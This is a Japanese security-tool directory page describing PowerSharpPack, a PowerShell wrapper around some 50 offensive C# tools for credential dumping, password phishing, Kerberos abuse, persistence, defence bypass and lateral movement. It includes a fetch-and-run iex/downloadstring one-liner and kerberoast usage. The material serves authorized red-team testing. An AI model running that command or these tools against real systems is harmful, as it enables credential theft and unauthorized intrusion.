Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PowerSharpPack — 50以上のC#製オフェンシブセキュリティツールをバンドルしたPowerShellラッパー。レッドチーム演習におけるポストエクスプロイテーション、特権昇格、資格情報のダンプ、ラテラルムーブメント、Active Directory偵察を目的としています。 | Kitploit
ツール/GitHubGitHub/s3cur3th1ssh1t/powersharppack
特権昇格エクスプロイトフレームワークペイロード生成横移動情報収集ポストエクスプロイトペネトレーションテストレッドチーミング
GitHubs3cur3th1ssh1t/powersharppack

PowerSharpPack

50以上のC#製オフェンシブセキュリティツールをバンドルしたPowerShellラッパー。レッドチーム演習におけるポストエクスプロイテーション、特権昇格、資格情報のダンプ、ラテラルムーブメント、Active Directory偵察を目的としています。

リポジトリを見る
1.7k3121年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

スポンサー

     

PowerSharpPack

多数の有用な攻撃的CSharpプロジェクトを、Powershellで簡単に使用できるようにラップしました。

なぜか? 私の個人的な見解では、攻撃的Powershellは、AMSI、スクリプトブロックログ、制限付き言語モード、その他の保護機能のために死んだわけではありません。これらのメカニズムはすべてバイパス可能です。最近の革新的な攻撃的セキュリティプロジェクトのほとんどはC#で書かれているため、それらをPowershellでも利用できるようにすることにしました。

では、基本的に何をしたのか?

  1. まず各C#リポジトリをクローン。
  2. クラスとmainメソッドをpublicに設定。
  3. 一部のプロジェクトでは、新機能やバグ修正を含むプルリクエストをマージしたり、パラメータ欠落などでPowershellプロセス全体が強制終了されないようにenvironment.exitステートメントを削除したりしました。
  4. その後、各バイナリをコンパイル。
  5. コンパイル済みバイナリをGzip圧縮およびBase64エンコードし、[System.Reflection.Assembly]::Load($DecompressedDecodedBinary) を介してPowershellにロード。

非常に簡単ですが、多くのリポジトリでは時間のかかるプロセスです。

どのツールが含まれていますか?

Internalmonologue

Internal Monologue Attack: LSASSに触れずにNTLMハッシュを取得

@Credit to: https://github.com/eladshamir/Internal-Monologue

Seatbelt

Seatbeltは、攻撃的および防御的セキュリティの両方の観点から関連する、セキュリティ指向のホスト調査「安全チェック」を多数実行するC#プロジェクトです。

@Credit to: https://github.com/GhostPack/Seatbelt

SharpWeb

Google Chrome、Mozilla Firefox、Microsoft Internet Explorer/Edgeから保存されたブラウザ認証情報を取得する.NET 2.0 CLRプロジェクト。

@Credit to: https://github.com/djhohnstein/SharpWeb

UrbanBishop

UrbanBishop内にローカルのRWセクションを作成し、そのセクションをリモートプロセスにRXとしてマッピングします。シェルコードのロードが簡単になります。

@Credit to: https://github.com/FuzzySecurity/Sharp-Suite

SharpUp

SharpUpは、さまざまなPowerUp機能のC#移植版です。

@Credit to: https://github.com/GhostPack/SharpUp

Rubeus

Rubeusは、生のKerberos操作と悪用のためのC#ツールセットです。

@Credit to: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/

SharPersist

C#で書かれたWindows永続化ツールキット。

@Credit to: https://github.com/fireeye/SharPersist

Sharpview

harmj0yのPowerViewのC#実装。

@Credit to: https://github.com/tevora-threat/SharpView

winPEAS

book.hacktricks.xyzのWindowsローカル権限昇格チェックリストを確認。

@Credit to: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Lockless

Locklessはロックされたファイルのコピーを可能にします。

@Credit to: https://github.com/GhostPack/Lockless

SharpChromium

Chromiumデータ(Cookie、履歴、保存済みログインなど)を取得する.NET 4.0 CLRプロジェクト。

@Credit to: https://github.com/djhohnstein/SharpChromium

SharpDPAPI

SharpDPAPIは、一部のMimikatz DPAPI機能のC#移植版です。

@Credit to: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/

SharpShares

現在のドメイン内のすべてのネットワーク共有を列挙します。また、名前をIPアドレスに解決することもできます。

@Credit to: https://github.com/djhohnstein/SharpShares

SharpSniper

ユーザー名とログオンIPアドレスを介してActive Directory内の特定のユーザーを検索します。

@Credit to: https://github.com/HunnicCyber/SharpSniper

SharpSpray

LDAPを使用してドメインの全ユーザーに対してパスワードスプレー攻撃を実行するシンプルなコードセットで、Cobalt Strikeと互換性があります。

@Credit to: https://github.com/jnqpblc/SharpSpray

Watson

欠落しているKBを列挙し、有用な権限昇格の脆弱性に対するエクスプロイトを提案します。

@Credit to: https://github.com/rasta-mouse/Watson

Grouper2

ADグループポリシーの脆弱性を発見します。

@Credit to: https://github.com/l0ss/Grouper2

Tokenvator

Windowsトークンで権限を昇格させるツール。

@Credit to: https://github.com/0xbadjuju/Tokenvator

SauronEye

特定の単語を含む特定のファイル(パスワードを含むファイルなど)を検索するツール。

@Credit to: https://github.com/vivami/SauronEye

メインスクリプトを以下のようにロードします。

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')

そして、ツールをスイッチパラメータとして選択します。例:

PowerSharpPack -seatbelt -Command "AMSIProviders"

alt text

バイナリに複数のパラメータを渡したい場合は、引用符を使用します。

PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"

何らかの理由ですべてのバイナリをロードしたくない場合は、PowerSharpBinariesフォルダにあるバイナリごとのPowershellスクリプトを使用できます。

スタンドアロンのPowershellスクリプトとしても利用可能なプロジェクト:

SharpCloud

AWS、Microsoft Azure、Google Computeに関連する資格情報ファイルの存在を確認するためのシンプルなC#。

@Credit to: https://github.com/chrismaddalena/SharpCloud

SharpSSDP

SSDPサービスディスカバリ。

@Credit to: https://github.com/rvrsh3ll/SharpSSDP

DAFT

DAFT: データベース監査フレームワーク&ツールキット。

@Credit to: https://github.com/NetSPI/DAFT

Get-RBCD-Threaded

Active Directory環境でリソースベースの制約付き委任攻撃パスを発見するツール。

@Credit to: https://github.com/FatRodzianko/Get-RBCD-Threaded

SharpGPO-RemoteAccessPolicies

グループポリシーを通じてリモートアクセスポリシーを列挙するC#ツール。

@Credit to: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies

SharpAllowedToAct

リソースベースの制約付き委任(msDS-AllowedToActOnBehalfOfOtherIdentity)を介したコンピュータオブジェクトの乗っ取り。

@Credit to: https://github.com/pkb1s/SharpAllowedToAct

WireTap

ビデオ、オーディオ、キーボードハードウェアと対話する.NET 4.0プロジェクト。

@Credit to: https://github.com/djhohnstein/WireTap

SharpClipboard

C#クリップボードモニタ。

@Credit to: https://github.com/slyd0g/SharpClipboard

SharpPrinter

プリンタを発見し、脆弱性を確認。

@Credit to: https://github.com/rvrsh3ll/SharpPrinter

SharpHide

隠しレジストリキーを作成するツール。

@Credit to: https://github.com/outflanknl/SharpHide

SpoolSample

MS-RPRN RPCインターフェースを介してWindowsホストに他のマシンへの認証を強制するPoCツール。他のプロトコルでも可能です。

@Credit to: https://github.com/leechristensen/SpoolSample

SharpGPOAbuse

SharpGPOAbuseはC#で書かれた.NETアプリケーションで、グループポリシーオブジェクト(GPO)に対するユーザーの編集権限を悪用して、そのGPOによって制御されるオブジェクトを侵害するために使用できます。

@Credit to: https://github.com/FSecureLABS/SharpGPOAbuse

SharpDump

SharpDumpはPowerSploitのOut-Minidump.ps1機能のC#移植版です。

@Credit to: https://github.com/GhostPack/SharpDump

SharpHound3

BloodHoundプロジェクト用C#データコレクター、バージョン3。

@Credit to: https://github.com/BloodHoundAD/SharpHound3

PostDump

LSASSプロセスのミニダンプを、検出を回避するいくつかのテクニックを使用して実行する別のツール。

@Credit to: https://github.com/YOLOP0wn/POSTDump

SharpLocker

SharpLockerは、偽のWindowsロック画面を表示して現在のユーザーの資格情報を取得します。すべての出力はコンソールに送信され、Cobalt Strikeに最適です。

@Credit to: https://github.com/Pickfordmatt/SharpLocker

Eyewitness

EyeWitnessは、Webサイトのスクリーンショットを撮り、サーバーヘッダー情報を提供し、可能であればデフォルトの資格情報を特定するように設計されています。

@Credit to: https://github.com/FortyNorthSecurity/EyeWitness

FakeLogonScreen

パスワードを盗むための偽のWindowsログオン画面。

@Credit to: https://github.com/bitsadmin/fakelogonscreen

P0wnedShell

PowerShell Runspaceポストエクスプロイテーションツールキット。

@Credit to: https://github.com/Cn33liz/p0wnedShell

Safetykatz

SafetyKatzは、@gentilkiwiのMimikatzプロジェクトのわずかに変更されたバージョンと@subTeeの.NET PEローダーの組み合わせです。 私はこれを独自の難読化されたMimikatzバージョンで再度修正しました。

@Credit to: https://github.com/GhostPack/SafetyKatz

InveighZero

Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6スプーファー/中間者攻撃ツール。

@Credit to: https://github.com/Kevin-Robertson/InveighZero

SharpSploit

SharpSploitはC#で書かれた.NETポストエクスプロイテーションライブラリです。

@Credit to: https://github.com/cobbr/SharpSploit

Snaffler

ペネトレーションテスターがおいしいキャンディを見つけるのを助けるツール(@l0ssと@Sh3r4作)。

@Credit to: https://github.com/SnaffCon/Snaffler

BadPotato

itm4nのPrintspooferをC#で実装。

@Credit to: https://github.com/BeichenDream/BadPotato

BetterSafetyKatz

SafetyKatzのフォークで、最新のプリコンパイル済みMimikatzリリースをgentilkiwiのGitHubリポジトリから動的に取得し、ランタイムで署名をパッチし、SharpSploit DInvokeを使用してPEロードをメモリ上で実行します。

@Credit to: https://github.com/Flangvik/BetterSafetyKatz

SharpKatz

Mimikatzのsekurlsa::logonpasswords、sekurlsa::ekeys、lsadump::dcsyncコマンドのC#移植版。

@Credit to: https://github.com/b4rtik/SharpKatz

Gopher

低い実りの脆弱性を発見するC#ツール。

@Credit to: https://github.com/EncodeGroup/Gopher

SharpOxidResolver

AirBus Security / PingCastle の IOXIDResolver。

@Credit to: https://github.com/vletoux/pingcastle/

SharpBlock

EDRのアクティブなプロジェクションDLLをエントリポイント実行を阻止することでバイパスする方法。

@Credit to: https://github.com/CCob/SharpBlock

SharpLoginPrompt

このプログラムは、現在のユーザーのユーザー名とパスワードを収集するためのログインプロンプトを作成します。このプロジェクトにより、レッドチームはlsassに触れたり、システム上で管理者資格情報を持たずに現在のユーザーのユーザー名とパスワードをフィッシングできます。

@Credit to: https://github.com/shantanu561993/SharpLoginPrompt

ThunderFox

ThunderbirdとFirefoxからデータ(連絡先、メール、履歴、Cookie、資格情報)を取得します。

@Credit to: https://github.com/V1V1/SharpScribbles

StickyNotesExtract

Windows Sticky Notesデータベースからデータを抽出します。Windows 10 Build 1607以降で動作します。このプロジェクトは外部依存関係に依存しません。

@Credit to: https://github.com/V1V1/SharpScribbles

SCShell

ChangeServiceConfigAに依存してコマンドを実行するファイルレス横移動ツール。

@Credit to: https://github.com/Mr-Un1k0d3r/SCShell

SharpSecDump

impacketのsecretsdump.pyのリモートSAM + LSA Secretsダンプ機能の.Net移植版。

@Credit to: https://github.com/G0ldenGunSec/SharpSecDump

SharpHandler

このプロジェクトは、lsassへの開いたハンドルを再利用してlsassを解析またはミニダンプするため、lsassと対話するために独自のハンドルを使用する必要がありません。

@Credit to: https://github.com/jfmaes/SharpHandler

SharpRDP

認証済みコマンド実行のためのリモートデスクトッププロトコル.NETコンソールアプリケーション。

@Credit to: https://github.com/0xthirteen/SharpRDP

SharpMove

認証済みリモート実行を実行するための.NETプロジェクト。

@Credit to: https://github.com/0xthirteen/SharpMove

SharpStay

永続化をインストールするための.NETプロジェクト。

@Credit to: https://github.com/0xthirteen/SharpStay

SharpPrintNightmare

PrintNightmare CVE-2021-1675/CVE-2021-34527のC#実装。

@Credit to: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare

Certify

Active Directory証明書の悪用。

@Credit to: https://github.com/GhostPack/Certify

Farmer

Farmerは、WindowsドメインでNetNTLMハッシュを収集するためのプロジェクトです。Farmerは、ローカルWebDAVサーバーを作成することで、接続するクライアントからのWebDAV Mini Redirector認証を引き起こします。

@Credit to: https://github.com/mdsecactivebreach/Farmer

SharpBypassUAC

UACバイパスのためのC#ツール。

@Credit to: https://github.com/FatRodzianko/SharpBypassUAC

StandIn

StandInは、小規模な.NET35/45 ADポストエクスプロイテーションツールキットです。

@Credit to: https://github.com/FuzzySecurity/StandIn

Carbuncle

レッドチームエンゲージメント中にoutlook interopと対話するためのツール。

@Credit to: https://github.com/checkymander/Carbuncle

Whisker

Whiskerは、対象アカウントのmsDS-KeyCredentialLink属性を操作して「シャドウ資格情報」を効果的に追加することで、Active Directoryのユーザーおよびコンピュータアカウントを乗っ取るC#ツールです。

@Credit to: https://github.com/eladshamir/Whisker

SharpLdapRelayScan

LdapRelayScanのC#移植版。

@Credit to: https://github.com/klezVirus/SharpLdapRelayScan

LdapSignCheck

LDAP署名をチェックするC#プロジェクト。

@Credit to: https://github.com/cube0x0/LdapSignCheck

SharpImpersonation

SharpImpersonation - トークンまたはシェルコードインジェクションによるユーザー偽装ツール。

@Credit to: https://github.com/S3cur3Th1sSh1t/SharpImpersonation

SharpWSUS

SharpWSUSは、WSUSを介した横移動のためのCSharpツールです。対応するブログ (https://labs.nettitude.com/blog/introducing-sharpwsus/) に、ツール、使用例、検出に関する詳細情報があります。

@Credit to: https://github.com/nettitude/SharpWSUS

MalSCCM

このツールは、ローカルまたはリモートのSCCMサーバーを悪用して、管理対象ホストに悪意のあるアプリケーションを展開することを可能にします。このツールを使用するには、現在のプロセスがSCCMサーバーに対する管理者権限を持っている必要があります。通常、SCCMの展開では、管理サーバーとプライマリサーバーが同じホストに存在するため、locateコマンドから返されたホストをプライマリサーバーとして使用できます。

@Credit to: https://github.com/nettitude/MalSCCM

KrbRelay

Kerberosリレーのためのフレームワーク。

@Credit to: https://github.com/cube0x0/KrbRelay

SharpSCCM

SCCMと対話するためのC#ユーティリティ。

@Credit: https://github.com/Mayyhem/SharpSCCM

ShadowSpray

ドメイン全体にシャドウ資格情報をスプレーし、他のオブジェクトに対する忘れられたGenericWrite/GenericAll DACLを悪用することを目的としたツール。

@Credit: https://github.com/Dec0ne/ShadowSpray

Grouper3

ADグループポリシーの脆弱性を見つけるが、Grouper2よりもうまくやる。

@Credit to: https://github.com/Group3r/Group3r

最後の2つは基本的にアセンブリではありません。しかし、メモリから実行するためのアセンブリを構築し、このリポジトリの手法でロード可能にしています。バックグラウンドでの別の実行手法ですが、それでも有用です:

HandleKatz

クローンハンドルを使用したPIC lsassダンパー。

@Credit to: https://github.com/codewhitesec/HandleKatz

NanoDump

意図的にLSASSをダンプします。

@Credit to: https://github.com/helpsystems/nanodump

PPLDump

ユーザーランドエクスプロイトでPPLのメモリをダンプします。

@Credit to: https://github.com/itm4n/PPLdump

ツールをダウンロード